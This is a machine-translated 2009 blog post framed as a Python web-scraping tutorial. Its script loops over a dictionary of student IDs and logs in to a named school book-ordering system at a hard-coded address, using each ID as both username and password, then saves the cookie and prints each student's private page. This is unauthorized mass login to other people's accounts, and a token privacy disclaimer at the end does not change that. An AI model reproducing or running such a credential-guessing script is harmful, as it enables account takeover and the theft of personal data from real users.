Journal

Web Scraping with Python for Login-Protected Websites

2009·06·26

Machine-translated from Chinese.  ·  Read original

Introduction to Web Scraping with Python

Last time, I introduced using PHP with the curl library to scrape grades. Actually, Python scripts can also accomplish similar tasks, and do so quite elegantly. I’m increasingly fond of Python, haha. This time, my target is the school’s book ordering website. This system has a huge vulnerability - all users’ default usernames and passwords are the same. So, I used it to practice web scraping. First, I’ll post the code. Here is the Python code:

import urllib, urllib2, cookielib
import re
f = open("字典地址", "r")
username = f.readline().rstrip()
txt_last = ""
while username != '':
    a = cookielib.CookieJar()
    b = urllib2.build_opener(urllib2.HTTPCookieProcessor(a))
    urllib2.install_opener(b)
    dust1 = 'http://211.82.90.56:8080/caubook/TeacherLog.aspx?' + \
            '__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgICBw8PZBY' + \
            'CHgdvbmNsaWNrBSdpZih0aGlzLmRpc2FibGVkPT1mYWxzZSl7cmV' + \
            '0dXJuICBiYygpO31kZP%2B9YQS1SQoVhX0gctevArgHvY9U&Tbusername;='
    dust2 = username
    dust3 = '&Tbuserpwd;='
    dust4 = username
    dust5 = '&RadioButtonList1;=%E5%AD%A6%E7%94%9F&Button1;=%E7%A1%AE%E8%AE%A4&__EVENTVALIDATION' + \
            '=%2FwEWBwKZqo6EDgKS6L7%2FCwK1gprrAQLo4%' + \
            '2BrNDQLN7c0VAveMotMNAoznisYGXMvRojLDcm7L2wkg34m0QFH3k5c%3D'
    response = urllib2.urlopen(dust1 + dust2 + dust3 + dust4 + dust5)
    next = urllib2.urlopen('http://211.82.90.56:8080/caubook/Student/StuAna1.aspx')
    # print next.read()
    txt = next.read()
    if (txt != txt_last):
        txt_last = txt
        # txt = re.compile(r'<[^>]+>').sub('', txt)
        print txt
    username = f.readline().rstrip()

The third and fourth lines open a file, which is used as a dictionary. Each line is a student ID, which will be read into the program and used as both the username and password (since the system defaults to the same username and password). Next, I’ll explain the key parts of the program. dust1-5 are used to construct the URL string fragments to be submitted. This can be obtained by analyzing the HTML POST section of the webpage and packet capture - in other words, as long as you can normally log in to the system by entering the dust1+dust2+dust3+dust4+dust5 link in the browser, it’s fine. This book subscription system has a lot of messy code, and I don’t know ASP.NET, nor do I know why I need to submit these… We only need to focus on the parameters following &Tbusername;= and &Tbuserpwd;= - one is the username, and the other is the password, both of which are student IDs. We need to use

response = urllib2.urlopen(dust1 + dust2 + dust3 + dust4 + dust5)

to submit this URL. After submitting, a cookie will be returned. Previously, I didn’t know how to save this cookie. In Python, we only need to set

a = cookielib.CookieJar()

and then execute

b = urllib2.build_opener(urllib2.HTTPCookieProcessor(a))
urllib2.install_opener(b)

to let the program automatically save the cookie returned after submission. Through the above introduction, we have already implemented simulating browser submission and saving returned cookies. Next, we only need to access the page we want to view under the condition of existing cookies (i.e., after logging in to the system). The following code is used for this purpose.

In summary, with simple lines of code, we can easily achieve simulated login and cookie saving. We can use it to complete more tasks. My task this time is to scrape data, so I won’t discuss the rest. You can research it yourself :)

P.S. When scraping data, please respect others’ privacy and do not damage their data. Violators are responsible for their own actions.

留 · 言